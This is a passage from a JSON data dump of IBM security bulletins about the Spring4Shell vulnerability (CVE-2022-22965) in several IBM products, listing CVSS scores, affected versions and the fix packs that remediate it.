)\n\n[sym-7.3.2-build601165](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Symphony&release=All&platform=All&function=fixId&fixids=sym-7.3.2-build601165&includeSupersedes=0> \"sym-7.3.2-build601165\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-20T03:16:58", "type": "ibm", "title": "Security Bulletin: IBM Spectrum Symphony is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-20T03:16:58", "id": "E7653A5862D76B5A32167F623532FE5567AFABF9A426F06C2CBA21BE4039657F", "href": "https://www.ibm.com/support/pages/node/6596873", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:03:38", "description": "## Summary\n\nRational Test Control Panel is affected but not vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used in the Rational Test Control Panel web application. The fix includes a patched version of the affected spring-beans-4.3.22 library\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nRational Test Control Panel component in Rational Test Virtualization Server| 9.2.1.1, 9.5, 10.0.2.1, 10.1.3, 10.2.2 \nRational Test Control Panel component in Rational Test Workbench| 9.2.1.1, 9.5, 10.0.2.1, 10.1.3, 10.2.2 \n \n* All versions prior to those shown are affected. Upgrade to the latest versions shown.\n\n \n\n\n## Remediation/Fixes\n\n 1. Verify the version of Rational Test Control Panel\n 2. Download the fix for your product from Fix Central, this can be obtained for either Rational Test Workbench or Rational Test Virtualization Server by selecting the product and relevant version before browsing for fixes. Select and download the fix pack named Rational-RTCP-&lt;_product-name_&gt;-&lt;_product-version_&gt;-CVE-2022-22965-ifix for your selected product.\n 3. Stop Rational Test Control Panel\n 4. Navigate to the existing Rational Test Control Panel installation \nThe default installation locations for these files are: \nWindows: `C:\\Program Files\\IBM\\RationalTestControlPanel\\ \n` AIX, Linux, Solaris: `/opt/IBM/RationalTestControlPanel/`\n 5. Copy the contents of the \"usr\" directory as a backup\n 6. Unzip the download fix into the `RationalTestControlPanel` directory, overwriting the existing files.\n 7. Start Rational Test Control Panel\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-16T17:10:46", "type": "ibm", "title": "Security Bulletin: Rational Test Control Panel component in Rational Test Virtualization Server and Rational Test Workbench is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-16T17:10:46", "id": "0465751AC2B09E6749CD032D525B17660008B7BDE693E1A430E27B2E32A33438", "href": "https://www.ibm.com/support/pages/node/6595721", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:04:05", "description": "## Summary\n\nIBM Sterling Connect:Direct Web Services is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. CDWS using Spring boot to develop REST APIs. The fix includes Spring boot version-2.6.6.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling Connect Direct Web Services| 1.0 \nIBM Sterling Connect:Direct Web Services| 6.1.0 \nIBM Sterling Connect:Direct Web Services| 6.2.0 \nIBM Sterling Connect:Direct Web Services| 6.0 \n \n\n\n## Remediation/Fixes\n\n**Product(s)**| **Version(s)**| **Remediation \n** \n---|---|--- \nIBM Sterling Connect Direct Web Services| 1.0| Apply 6.0.0.8, available on [Fix Central](<https://www.ibm.com/support/fixcentral/options?selectionBean.selectedTab=find&selection=ibm%2fOther+software%3bibm%2fOther+software%2fIBM+Connect%3aDirect+Web+Services> \"\" ) \nIBM Sterling Connect:Direct Web Services| 6.0| Apply 6.0.0.8, available on [Fix Central](<https://www.ibm.com/support/fixcentral/options?selectionBean.selectedTab=find&selection=ibm%2fOther+software%3bibm%2fOther+software%2fIBM+Connect%3aDirect+Web+Services> \"\" ) \nIBM Sterling Connect:Direct Web Services| 6.1| Apply 6.1.0.12, available on [Fix Central](<https://www.ibm.com/support/fixcentral/options?selectionBean.selectedTab=find&selection=ibm%2fOther+software%3bibm%2fOther+software%2fIBM+Connect%3aDirect+Web+Services> \"\" ) \nIBM Sterling Connect:Direct Web Services| 6.2| Apply 6.2.0.6, available on [Fix Central](<https://www.ibm.com/support/fixcentral/options?selectionBean.selectedTab=find&selection=ibm%2fOther+software%3bibm%2fOther+software%2fIBM+Connect%3aDirect+Web+Services> \"\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T05:50:15", "type": "ibm", "title": "Security Bulletin: IBM Sterling Connect:Direct Web Services is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-07T05:50:15", "id": "D77134C81C99E57B976FD13B327D499D7859624EF6E1B9534595C21A83A1761B", "href": "https://www.ibm.com/support/pages/node/6592977", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:05:53", "description": "## Summary\n\nOperations Dashboard in Cloud Pak for Integration is affected by Spring4Shell CVE-2022-22965 with details below\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nOperations Dashboard| 2020.4.1 \n2021.1.1 \n2021.2.1 \n2021.3.1 \n2021.4.1 \n \n\n\n## Remediation/Fixes\n\n**Operations Dashboard version 2020.4.1 in IBM Cloud Pak for Integration** \nUpgrade Operations Dashboard to 2020.4.1-8-eus using the Operator upgrade process described in the IBM Documentation \n<https://www.ibm.com/docs/en/cloud-paks/cp-integration/2020.4?topic=components-upgrading-operations-dashboard> \n \n**Operations Dashboard version 2021.1.1, 2021.2.1, 2021.3.1, and 2021.4.1 in IBM Cloud Pak for Integration** \nUpgrade Operations Dashboard to 2021.4.1-4 using the Operator upgrade process described in the IBM Documentation \n<https://www.ibm.com/docs/en/cloud-paks/cp-integration/2021.4?topic=capabilities-upgrading-integration-tracing>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T14:59:37", "type": "ibm", "title": "Security Bulletin: Operations Dashboard in Cloud Pak for Integration is affected by Spring4Shell CVE-2022-22965", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-27T14:59:37", "id": "ED11CF0606100E816592CB9CC87F176EF4BB64094BA5B7978B3810737572EBA4", "href": "https://www.ibm.com/support/pages/node/6575447", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:04:38", "description": "## Summary\n\nIBM Sterling Control Center is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. The fix includes Spring Framework 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling Control Center| 6.2.1.0 \nIBM Sterling Control Center| 6.2.0.0 \n \n\n\n## Remediation/Fixes\n\n**Product**\n\n| \n\n**Version**\n\n| \n\n**iFix**\n\n| \n\n**Remediation** \n \n---|---|---|--- \n \nIBM Sterling Control Center\n\n| \n\n6.2.1.0\n\n| \n\niFix07\n\n| \n\n[Fix Central - 6.2.1.0](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Control+Center&release=6.2.1.0&platform=All&function=all>) \n \nIBM Sterling Control Center\n\n| \n\n6.2.0.0\n\n| \n\niFix17\n\n| \n\n[Fix Central - 6.2.0.0](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Control+Center&release=6.2.0.0&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-25T22:33:00", "type": "ibm", "title": "Security Bulletin: IBM Sterling Control Center is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-25T22:33:00", "id": "8EA98A1ACD7FB64C20AF5E150C5876B7A376F3920E71B4315AC3EAC3F292126E", "href": "https://www.ibm.com/support/pages/node/6589989", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:05:16", "description": "## Summary\n\nIBM Robotic Process Automation with Automation Anywhere is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. IBM Robotic Process Automation with Automation Anywhere control room is using Spring Framework 5.1.6 with JDK 11. The fix will upgrade Spring Framework version to 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Robotic Process Automation with Automation Anywhere| 19.0 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the Spring Framework issue by upgrading to fix pack 19.0.0.10.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-19T16:14:28", "type": "ibm", "title": "Security Bulletin: IBM Robotic Process Automation with Automation Anywhere is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-19T16:14:28", "id": "D259E621EF9ECC71F1E5CA25BD5CC4DDE78CFECBB5FC21F2E4BCB16169E0B602", "href": "https://www.ibm.com/support/pages/node/6587935", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:03:30", "description": "## Summary\n\nIBM Spectrum Conductor is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. IBM Spectrum Condustor includes Spring Framework related classes in the package. It impacts the ascd, WEBGUI and HostFactory components. The fix upgrades spring framework into 5.2.20.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n_**Affected Product(s)**_| _**Version(s)**_ \n---|--- \nIBM Spectrum Conductor| 2.4.1 \nIBM Spectrum Conductor| 2.5.0 \nIBM Spectrum Conductor| 2.5.1 \n \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by upgrading the following interim fixes in the table:**\n\n_**Products**_| _**VRMF**_| _**APAR**_| _**Remediation/Fix**_ \n---|---|---|--- \nIBM Spectrum Conductor| 2.4.1| P104680| \n\n[sc-2.4.1-build601166](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.4.1-build601166&includeSupersedes=0> \"sc-2.4.1-build601166\" ) \n \nIBM Spectrum Conductor| 2.5.0| P104681| \n\n[sc-2.5-build601167](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.5-build601167&includeSupersedes=0> \"sc-2.5-build601167\" ) \n \nIBM Spectrum Conductor| 2.5.1| P104682| \n\n[sc-2.5.1-build601169](<http://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/Other+software/IBM+Spectrum+Conductor+with+Spark&release=All&platform=All&function=fixId&fixids=sc-2.5.1-build601169&includeSupersedes=0> \"sc-2.5.1-build601169\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-20T02:10:14", "type": "ibm", "title": "Security Bulletin: IBM Spectrum Conductor is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-20T02:10:14", "id": "78AC818528F1ED5E96DF9765AA477784E752DB03E5EC0169C89AD690326E3F5F", "href": "https://www.ibm.com/support/pages/node/6596867", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T05:55:30", "description": "## Summary\n\nIBM Cloud Pak for Business Automation is affected but not classified as vulnerable to a remote code execution in Spring Framework as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Parts of the Spring framework is used in multiple components of Cloud Pak for Business Automation to perform transaction management, database access or processing of web request. The fix includes Spring V5.3.20 and later and removes Spring from some product components. [CVE-2022-22965]\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n**DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) | Status \n---|---|--- \nIBM Cloud Pak for Business Automation | V22.0.1 - V22.0.1-IF001 | affected \nIBM Cloud Pak for Business Automation | V21.0.3 - V21.0.3-IF011 | affected \nIBM Cloud Pak for Business Automation | V21.0.2 - V21.0.2-IF012 and later fixes \nV21.0.1 - V21.0.1-IF007 and later fixes \nV20.0.1 - V20.0.3 and later fixes \nV19.0.1 - V19.0.3 and later fixes \nV18.0.0 - V18.0.2 and later fixes | affected \n \n## Remediation/Fixes\n\nApply [21.0.3-IF012](<https://www.ibm.com/support/pages/node/6612563> \"21.0.3-IF012\" ) or [22.0.1-IF002](<https://www.ibm.com/support/pages/node/6612561> \"22.0.1-IF002\" ) in order to upgrade the version of Spring framework libraries. Affected Product(s) | Version(s) | Remediation / Fix \n---|---|--- \nIBM Cloud Pak for Business Automation | 22.0.1 - 22.0.1-IF001 | Apply [22.0.1-IF002](<https://www.ibm.com/support/pages/node/6612561> \"22.0.1-IF002\" ) or later \nIBM Cloud Pak for Business Automation | 21.0.3 - 21.0.3-IF011 | Apply [21.0.3-IF012](<https://www.ibm.com/support/pages/node/6612563> \"21.0.3-IF012\" ) or later \nIBM Cloud Pak for Business Automation | V21.0.2 - V21.0.2-IF012 and later fixes \nV21.0.1 - V21.0.1-IF007 and later fixes \nV20.0.1 - V20.0.3 and later fixes \nV19.0.1 - V19.0.3 and later fixes \nV18.0.0 - V18.0.2 and later fixes | Upgrade to \n[21.0.3-IF012](<https://www.ibm.com/support/pages/node/6612563> \"21.0.3-IF012\" ) or later or \n[22.0.1-IF002](<https://www.ibm.com/support/pages/node/6612561> \"22.0.1-IF002\" ) or later \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-06T04:45:54", "type": "ibm", "title": "Security Bulletin: IBM Cloud Pak for Business Automation is affected but not classified as vulnerable by a remote code execution in Spring Framework [CVE-2022-22965]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-10-06T04:45:54", "id": "0873F460B0C56BEFFB7C20248A3B9104F79891FA48CE8B004739684341A51D1D", "href": "https://www.ibm.com/support/pages/node/6826635", "cvss": {"score": 